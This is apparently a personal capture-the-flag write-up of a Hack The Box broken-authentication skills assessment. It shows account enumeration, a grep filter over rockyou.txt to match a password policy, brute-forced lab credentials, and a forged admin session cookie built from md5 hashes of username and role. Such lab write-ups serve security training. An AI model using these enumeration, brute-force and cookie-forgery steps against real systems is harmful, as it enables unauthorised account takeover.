Broken Authentication
Skills Assessment - Hardest module for CBBH path
Register an account
credentials
123francis123:P@ssw0rd1P@ssw0rd123
if you try common passwords it will be blocked with password policy.
Password policy:
The password must start with a capital letter
The password must end with a digit
The password must contain at least one special char: $ # @
The password is shorter than 20 characters
From support page, we know there is a global account called support
It also mentioned other accounts remain unchanged and we can continue to contact any department by adding country code
lets try to IDOR on support account with a wordlist of country codes.
There is /messages.php which can be used to bruteforce different usernames via intruder since there is rate limiting on logins
Country code wordlist
/home/francis/HTB/SecLists/Fuzzing/country-codes.txt
it will take some time to fuzz for the different types of support accounts based on country code.
Lets filter rockyou.txt to remove characters based on password policy
grep '[[:upper:]]' rockyou.txt | grep '[[:punct:]]' | grep '[[:lower:]]' | grep -E '^.{20,20}$' | grep '[[:digit:]]$'
the custom rockyou.txt password list can be used to bruteforce the different support accounts.
After manual bruteforcing via login page,see below for the valid credentials.
support.cn:BisocaBuzau#20061985
support.it:Mustang#firebird1995
support.gr:Situngkir766H!011104
support.uk:TrillPrincessMentality#1
support.us:Mustang#firebird1995
From support.gr, get the session cookie and run ./dcode<session cookie> using Decodify
./dcode NjhjOTI2MDA5MDYyMGU1ZjQ3MWVhYWVlY2IwYmNlNTk6NDM0OTkwYzhhMjVkMmJlOTQ4NjM1NjFhZTk4YmQ2ODI%3D
Decoded from Base64 : 68c9260090620e5f471eaaeecb0bce59:434990c8a25d2be94863561ae98bd682
it seems like the output above is in this format <md5 hash>:<md5 hash>
lets try to manually decode the md5 hash one by one
the hash format is support.gr:support and is under username:role
now lets try to change the username:role to admin privileges
admin.gr:admin and encode it to md5
echo -n 'admin.gr' | md5sum
041da04f12f5c3768bd0f9cb1efd5572
echo -n 'admin' | md5sum
21232f297a57a5a743894a0e4a801fc3
So the new format is 041da04f12f5c3768bd0f9cb1efd5572:21232f297a57a5a743894a0e4a801fc3
now lets use CyberChef to encode it to base64 and URL encode
MDQxZGEwNGYxMmY1YzM3NjhiZDBmOWNiMWVmZDU1NzI6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Enter the cookie via developer tools to get flag
Last updated